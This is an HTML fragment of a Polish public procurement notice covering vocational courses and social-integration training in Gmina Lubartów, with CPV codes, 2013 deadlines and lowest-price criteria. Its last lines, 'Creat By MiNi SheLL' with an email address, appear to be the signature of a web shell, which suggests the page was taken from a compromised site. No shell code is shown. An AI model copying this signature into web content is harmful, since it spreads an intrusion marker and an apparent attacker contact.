<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kursy i szkolenia zawodowe - gr. 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów i szkoleń zawodowych w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów zgodnie ze szczegółowym opisem zawartym w SIWZ. W skład tej części zamówienia wchodzą następujące kursy/szkolenia: 
1. Prawo jazdy kat. D - 2 os., 80 godz./os. (po 20 godz. dydaktycznych teorii i 60 godz. zegarowych praktyki/os.), miejsce realizacji: zaj. teor. - Miasto Lubartów, zaj. prakt. - Miasto Lubartów i/lub Miasto Lublin.
Termin realizacji cz. II - do 30.11.2013 z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.10.00-8, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kursy i szkolenia zawodowe - gr. 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów i szkoleń zawodowych w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów zgodnie ze szczegółowym opisem zawartym w SIWZ. W skład tej części zamówienia wchodzą następujące kursy/szkolenia: 
1. Spawacz MIG i MAG - 2 os., 260 godz./os., miejsce realizacji: Miasto Lubartów i/lub Miasto Lublin.
Termin realizacji cz. III - do 30.11.2013 z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wsparcie z zakresu integracji zawodowej i społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie zajęć z zakresu integracji zawodowej i społecznej dla 18 osób w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów zgodnie ze szczegółowym opisem zawartym w SIWZ. Miejsce realizacji zajęć: Miasto Lubartów. W skład tej części zamówienia wchodzą następujące instrumenty aktywnej integracji: 
1. Zajęcia z doradcą zawodowym - 18 osób, 52 godziny (16 godz. zajęć grupowych, 36 godz. zajęć indywidualnych - po 2 godz. dla każdego uczestnika). 
2. Trening kompetencji i umiejętności społecznych - 18 osób, 66 godzin (30 godzin zajęć grupowych i 36 godzin zajęć indywidualnych - po 2 godziny na osobę).
Termin realizacji cz. IV - w ciągu 5 tygodni (35 dni) od dnia zawarcia umowy Zamawiającego z Wykonawcą z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.10-7, 80.57.00.00-0, 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com